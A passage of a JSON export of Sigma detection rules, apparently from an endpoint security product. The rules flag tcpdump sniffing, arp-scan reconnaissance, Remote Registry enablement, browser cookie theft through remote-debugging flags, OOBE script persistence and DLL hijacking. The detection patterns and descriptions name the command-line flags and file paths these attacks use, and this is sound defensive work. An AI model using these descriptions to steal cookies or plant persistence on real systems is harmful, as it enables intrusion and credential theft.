ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n - ProcessImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n ProcessParentOriginalFileName: 'QuietExe.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6624dc1b-2cc0-4936-b502-8f6ec161ba8e",
"rule_name": "Remote Registry Service Enabled via SCM",
"rule_description": "Detects when the Remote Registry Service is enabled via the Service Control Manager.\nThis service is disabled by default on workstations (starting with Windows 8) and enabled on servers.\nAn adversary can remotely manipulate the registry of another machine if the Remote Registry service is enabled and valid credentials are obtained.\nIt can be used by an attacker to prepare a Lateral Movement technique, discover the configuration of a host, achieve persistence, or anything that aids an adversary in achieving their objective.\nIt is recommended to analyze the authentications and network activity around this alert to determine the user and host responsible for this action and to determine whether this action is legitimate.\n",
"rule_creation_date": "2025-08-04",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "664cd2df-1afc-49fd-9f6c-211ad8f00f7d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087660Z",
"creation_date": "2026-03-23T11:45:34.087662Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087666Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/fdb6cdb7c66b8164aefb57c4ff88e594f0bae068/atomics/T1040/T1040.md#atomic-test-1---packet-capture-linux-using-tshark-or-tcpdump",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1040_network_sniffing_tcpdump.yml",
"content": "title: Network Sniffed via tcpdump (Linux)\nid: 664cd2df-1afc-49fd-9f6c-211ad8f00f7d\ndescription: |\n Detects the execution of tcpdump, a command-line utility used to capture and analyze network traffic.\n Adversaries can use tcpdump to sniff the network traffic and capture information about an environment, including authentication materials passed over the network.\n It is recommended to investigate the context of the execution to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/fdb6cdb7c66b8164aefb57c4ff88e594f0bae068/atomics/T1040/T1040.md#atomic-test-1---packet-capture-linux-using-tshark-or-tcpdump\n - https://attack.mitre.org/techniques/T1040/\ndate: 2022/12/26\nmodified: 2025/10/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Tcpdump\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/tcpdump'\n\n exclusion_qualys:\n GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n\n exclusion_thumbnail:\n GrandparentCommandLine: '/usr/bin/python3.6 /opt/vdcm/bin/vdcm-get-thumbnail'\n\n exclusion_cron:\n Ancestors|contains: '|/usr/sbin/crond|'\n\n exclusion_timeout:\n ParentImage: '/usr/bin/timeout'\n\n exclusion_containers:\n Ancestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/containerd-shim-runc-v2|'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "664cd2df-1afc-49fd-9f6c-211ad8f00f7d",
"rule_name": "Network Sniffed via tcpdump (Linux)",
"rule_description": "Detects the execution of tcpdump, a command-line utility used to capture and analyze network traffic.\nAdversaries can use tcpdump to sniff the network traffic and capture information about an environment, including authentication materials passed over the network.\nIt is recommended to investigate the context of the execution to determine if this action was legitimate.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-10-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1040"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "666092ca-01b6-41c8-ba46-d9e6b01af49a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077889Z",
"creation_date": "2026-03-23T11:45:34.077891Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077895Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/wunderwuzzi23/firefox-cookiemonster",
"https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/",
"https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/",
"https://spycloud.com/blog/infostealers-bypass-new-chrome-security-feature/",
"https://mango.pdf.zone/stealing-chrome-cookies-without-a-password",
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1539_cursed_cookies_firefox.yml",
"content": "title: Possible Attempt to Steal Firefox Cookies via Remote Debugging\nid: 666092ca-01b6-41c8-ba46-d9e6b01af49a\ndescription: |\n Detects Firefox being launched with a remote debugging port and a headless option.\n This allows an attacker to subsequently issue requests to the Firefox application and retrieve user cookies, they will be decrypted by Firefox itself and sent through the Debug Port.\n This particular technique is usually used in conjunction with the Firefox Cookiemonster program that issues the correct API requests to the Firefox browser.\n While a YARA rule has also been made for that specific binary, these commands could also be issued through different means.\n More information about the commands is in the Github code mentioned in the references, which is quite simple, investigation could be done through network packets sent through the debug port.\n Possible False Positive information is also included at the bottom of this rule.\n It is recommended to analyze the context around the execution of Firefox to determine if it was executed by or in the context of a suspicious binary.\nreferences:\n - https://github.com/wunderwuzzi23/firefox-cookiemonster\n - https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/\n - https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/\n - https://spycloud.com/blog/infostealers-bypass-new-chrome-security-feature/\n - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password\n - https://attack.mitre.org/techniques/T1539/\ndate: 2023/03/30\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n Image|endswith: '\\firefox.exe'\n CommandLine|contains|all:\n - '-start-debugger-server'\n - '-headless'\n\n exclusion_intellij_wsl:\n Ancestors|contains: '|?:\\Windows\\System32\\wsl.exe|?:\\Program Files\\JetBrains\\IntelliJ IDEA*\\bin\\idea64.exe|'\n\n exclusion_node:\n Ancestors|contains: '|?:\\Program Files\\nodejs\\node.exe|'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - \"The default Firefox port for debugging is 9222, this may be used by Web Developers but might be indicative of an attacker trying to disguise as a legitimate user.\"\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "666092ca-01b6-41c8-ba46-d9e6b01af49a",
"rule_name": "Possible Attempt to Steal Firefox Cookies via Remote Debugging",
"rule_description": "Detects Firefox being launched with a remote debugging port and a headless option.\nThis allows an attacker to subsequently issue requests to the Firefox application and retrieve user cookies, they will be decrypted by Firefox itself and sent through the Debug Port.\nThis particular technique is usually used in conjunction with the Firefox Cookiemonster program that issues the correct API requests to the Firefox browser.\nWhile a YARA rule has also been made for that specific binary, these commands could also be issued through different means.\nMore information about the commands is in the Github code mentioned in the references, which is quite simple, investigation could be done through network packets sent through the debug port.\nPossible False Positive information is also included at the bottom of this rule.\nIt is recommended to analyze the context around the execution of Firefox to determine if it was executed by or in the context of a suspicious binary.\n",
"rule_creation_date": "2023-03-30",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "66612dcf-97ff-48d8-a464-e0da524154d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613331Z",
"creation_date": "2026-03-23T11:45:34.613335Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613343Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.kali.org/tools/arp-scan/",
"https://linux.die.net/man/1/arp-scan",
"https://attack.mitre.org/techniques/T1018/",
"https://attack.mitre.org/techniques/T1046/"
],
"name": "t1018_arp_scan_linux.yml",
"content": "title: Arp-scan Execution\nid: 66612dcf-97ff-48d8-a464-e0da524154d2\ndescription: |\n Detects the execution of arp-scan, a tool used to discover and map local network hosts using the ARP protocol.\n ARP (Address Resolution Protocol) is a network protocol that maps IP addresses to MAC (physical) addresses on a local network.\n While legitimate for network administration, attackers commonly use this tool during reconnaissance to enumerate potential targets and understand network topology without generating TCP/UDP traffic.\n It is recommended to investigate unauthorized arp-scan usage, correlate with other network discovery activities, and review affected network segments while identifying the source system of scanning attempts.\nreferences:\n - https://www.kali.org/tools/arp-scan/\n - https://linux.die.net/man/1/arp-scan\n - https://attack.mitre.org/techniques/T1018/\n - https://attack.mitre.org/techniques/T1046/\ndate: 2022/12/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - attack.t1046\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Tool.ArpScan\n - classification.Linux.Behavior.NetworkScan\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/arp-scan'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "66612dcf-97ff-48d8-a464-e0da524154d2",
"rule_name": "Arp-scan Execution",
"rule_description": "Detects the execution of arp-scan, a tool used to discover and map local network hosts using the ARP protocol.\nARP (Address Resolution Protocol) is a network protocol that maps IP addresses to MAC (physical) addresses on a local network.\nWhile legitimate for network administration, attackers commonly use this tool during reconnaissance to enumerate potential targets and understand network topology without generating TCP/UDP traffic.\nIt is recommended to investigate unauthorized arp-scan usage, correlate with other network discovery activities, and review affected network segments while identifying the source system of scanning attempts.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1046"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "666add95-2a14-413a-8118-e37d63ce67e7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079984Z",
"creation_date": "2026-03-23T11:45:34.079986Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079990Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BishopFox/sliver/wiki/Cursed",
"https://github.com/mandatoryprogrammer/CursedChrome",
"https://mango.pdf.zone/stealing-chrome-cookies-without-a-password",
"https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/",
"https://null-byte.wonderhowto.com/how-to/analyze-web-browser-extensions-for-possible-malware-other-malicious-activity-0236335/",
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1539_cursed_cookies_chrome.yml",
"content": "title: Possible Attempt to Steal Chrome Cookies via Remote Debugging\nid: 666add95-2a14-413a-8118-e37d63ce67e7\ndescription: |\n This rule detects Chrome being launched with a remote debugging port and a user data directory option pointed to a Chrome's User Data or Debug directory.\n This allows an attacker to subsequently issue requests to the Chrome application and retrieve user cookies, they will be decrypted by Chrome itself and sent through the Debug Port.\n This technique is usually accompanied by adding the Cursed Chrome extension to the browser, it is recommended to investigate extensions present on the browser.\n A guide is present in the references.\n False Positive may happen in one of these cases below:\n - The default Chrome port for debugging is 9222, this may be used by Web Developers but might be indicative of an attacker trying to disguise as a legitimate user.\n - When this technique is used, the --user-data-dir or --headless options are used, but these may not be necessary if it is executed through PowerShell.\n It is recommended to investigate the context of this action to determine its legitimacy.\nreferences:\n - https://github.com/BishopFox/sliver/wiki/Cursed\n - https://github.com/mandatoryprogrammer/CursedChrome\n - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password\n - https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/\n - https://null-byte.wonderhowto.com/how-to/analyze-web-browser-extensions-for-possible-malware-other-malicious-activity-0236335/\n - https://attack.mitre.org/techniques/T1539/\ndate: 2023/03/24\nmodified: 2025/04/18\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_image:\n Image|endswith: '\\chrome.exe'\n\n selection_debug:\n CommandLine|contains: '--remote-debugging-port'\n\n selection_profile:\n CommandLine|contains: '--profile-directory'\n\n selection_datadir1:\n CommandLine|contains: '--user-data-dir'\n\n selection_datadir2:\n CommandLine|contains:\n - '\\Library\\Application Support\\Google\\Chrome'\n - '\\AppData\\Local\\Google\\Chrome\\User Data'\n\n # Used by Rhadamanthys stealer\n # https://any.run/report/7ac46862182e38faa8d46cdd384b47c45b4c4c28a898746248de845625c08f5a/eb3faa14-7861-439e-9664-ea1dc0185a35\n selection_window:\n CommandLine|contains|all:\n - '--explicitly-allowed-ports'\n - '--new-window'\n\n filter_legitimate:\n CommandLine|contains: '--remote-debugging-port=0'\n\n exclusion_testcomplete:\n ParentImage|endswith: '\\TestComplete.exe'\n Signed: 'true'\n Company: 'SmartBear'\n\n exclusion_testcomplete_2:\n GrandparentImage|endswith: '\\TestComplete.exe'\n Signed: 'true'\n Company: 'SmartBear'\n\n condition: selection_image and ((selection_debug and (selection_profile or (all of selection_datadir*))) or selection_window) and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "666add95-2a14-413a-8118-e37d63ce67e7",
"rule_name": "Possible Attempt to Steal Chrome Cookies via Remote Debugging",
"rule_description": "This rule detects Chrome being launched with a remote debugging port and a user data directory option pointed to a Chrome's User Data or Debug directory.\nThis allows an attacker to subsequently issue requests to the Chrome application and retrieve user cookies, they will be decrypted by Chrome itself and sent through the Debug Port.\nThis technique is usually accompanied by adding the Cursed Chrome extension to the browser, it is recommended to investigate extensions present on the browser.\nA guide is present in the references.\nFalse Positive may happen in one of these cases below:\n - The default Chrome port for debugging is 9222, this may be used by Web Developers but might be indicative of an attacker trying to disguise as a legitimate user.\n - When this technique is used, the --user-data-dir or --headless options are used, but these may not be necessary if it is executed through PowerShell.\nIt is recommended to investigate the context of this action to determine its legitimacy.\n",
"rule_creation_date": "2023-03-24",
"rule_modified_date": "2025-04-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "666da981-8237-4850-9529-ff7a5cd34116",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074596Z",
"creation_date": "2026-03-23T11:45:34.074598Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074603Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/BishopFox/sliver/wiki/Cursed",
"https://mango.pdf.zone/stealing-chrome-cookies-without-a-password",
"https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/",
"https://spycloud.com/blog/infostealers-bypass-new-chrome-security-feature/",
"https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/",
"https://null-byte.wonderhowto.com/how-to/analyze-web-browser-extensions-for-possible-malware-other-malicious-activity-0236335/",
"https://attack.mitre.org/techniques/T1539/"
],
"name": "t1539_cursed_cookies_edge.yml",
"content": "title: Possible Attempt to Steal Edge Cookies via Remote Debugging\nid: 666da981-8237-4850-9529-ff7a5cd34116\ndescription: |\n Detects Edge being launched with a remote debugging port and a user data directory option pointed to a Edge's User Data or Debug directory.\n This allows an attacker to subsequently issue requests to the Edge application and retrieve user cookies, they will be decrypted by Edge itself and sent through the Debug Port.\n This technique is usually accompanied by adding the Cursed Chrome extension to the browser, it is recommended to investigate extensions present on the browser. A guide is present in the references.\n It is recommended to investigate the parent process to determine the legitimacy of this action.\nreferences:\n - https://github.com/BishopFox/sliver/wiki/Cursed\n - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password\n - https://redcanary.com/blog/threat-intelligence/google-chrome-app-bound-encryption/\n - https://spycloud.com/blog/infostealers-bypass-new-chrome-security-feature/\n - https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/\n - https://null-byte.wonderhowto.com/how-to/analyze-web-browser-extensions-for-possible-malware-other-malicious-activity-0236335/\n - https://attack.mitre.org/techniques/T1539/\ndate: 2023/03/24\nmodified: 2025/08/19\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_image:\n Image|endswith: '\\msedge.exe'\n\n selection_profile:\n CommandLine|contains|all:\n - '--remote-debugging-port'\n - '--profile-directory'\n\n selection_datadir1:\n CommandLine|contains|all:\n - '--remote-debugging-port'\n - '--user-data-dir'\n\n selection_datadir2:\n CommandLine|contains:\n - '\\Library\\Application Support\\Microsoft\\Edge'\n - '\\AppData\\Local\\Microsoft\\Edge\\User Data'\n\n # Used by Rhadamanthys stealer\n # https://any.run/report/7ac46862182e38faa8d46cdd384b47c45b4c4c28a898746248de845625c08f5a/eb3faa14-7861-439e-9664-ea1dc0185a35\n selection_window:\n CommandLine|contains|all:\n - '--explicitly-allowed-ports'\n - '--new-window'\n\n filter_legitimate:\n CommandLine|contains: '--remote-debugging-port=0'\n\n condition: selection_image and (selection_profile or all of selection_datadir* or selection_window) and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "666da981-8237-4850-9529-ff7a5cd34116",
"rule_name": "Possible Attempt to Steal Edge Cookies via Remote Debugging",
"rule_description": "Detects Edge being launched with a remote debugging port and a user data directory option pointed to a Edge's User Data or Debug directory.\nThis allows an attacker to subsequently issue requests to the Edge application and retrieve user cookies, they will be decrypted by Edge itself and sent through the Debug Port.\nThis technique is usually accompanied by adding the Cursed Chrome extension to the browser, it is recommended to investigate extensions present on the browser. A guide is present in the references.\nIt is recommended to investigate the parent process to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-03-24",
"rule_modified_date": "2025-08-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6672ee8f-9e54-4cf9-8906-b4a7a71812b1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085926Z",
"creation_date": "2026-03-23T11:45:34.085928Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085933Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2024/02/05/persistence-windows-setup-script/",
"https://attack.mitre.org/techniques/T1554/"
],
"name": "t1554_windows_setup_script_persistence_executed.yml",
"content": "title: Windows Out of Box Experience Persistence Executed\nid: 6672ee8f-9e54-4cf9-8906-b4a7a71812b1\ndescription: |\n Detects the execution of a process related to the Windows Out of Box Experience (OOBE).\n The script \"%WINDIR%\\Setup\\Scripts\\ErrorHandler.cmd\" is executed whenever tools under \"C:\\WINDOWS\\System32\\oobe\" directory fail to run for any reason.\n It is for example the case of the Windows setup binary that is executed when the Windows Operating system is installed or upgraded.\n An adversary can use this technique to persistently execute a malicious code.\n It is recommended to investigate the \"%WINDIR%\\Setup\\Scripts\\ErrorHandler.cmd\" script to determine the legitimacy of its content.\nreferences:\n - https://pentestlab.blog/2024/02/05/persistence-windows-setup-script/\n - https://attack.mitre.org/techniques/T1554/\ndate: 2024/02/05\nmodified: 2025/02/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1554\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\Setup\\Scripts\\ErrorHandler.cmd'\n GrandparentImage|startswith: '?:\\Windows\\System32\\oobe\\'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6672ee8f-9e54-4cf9-8906-b4a7a71812b1",
"rule_name": "Windows Out of Box Experience Persistence Executed",
"rule_description": "Detects the execution of a process related to the Windows Out of Box Experience (OOBE).\nThe script \"%WINDIR%\\Setup\\Scripts\\ErrorHandler.cmd\" is executed whenever tools under \"C:\\WINDOWS\\System32\\oobe\" directory fail to run for any reason.\nIt is for example the case of the Windows setup binary that is executed when the Windows Operating system is installed or upgraded.\nAn adversary can use this technique to persistently execute a malicious code.\nIt is recommended to investigate the \"%WINDIR%\\Setup\\Scripts\\ErrorHandler.cmd\" script to determine the legitimacy of its content.\n",
"rule_creation_date": "2024-02-05",
"rule_modified_date": "2025-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1554"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6673e47f-a4ed-4de4-928c-1d6b6f36f56a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075524Z",
"creation_date": "2026-03-23T11:45:34.075526Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075531Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://twitter.com/0xcarnage/status/1203882560176218113",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdeunlock.yml",
"content": "title: DLL Hijacking via BDEUNLOCK.EXE.exe\nid: 6673e47f-a4ed-4de4-928c-1d6b6f36f56a\ndescription: |\n Detects potential Windows DLL Hijacking via BDEUNLOCK.EXE.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://twitter.com/0xcarnage/status/1203882560176218113\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BDEUNLOCK.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dui70.dll'\n - '\\duser.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
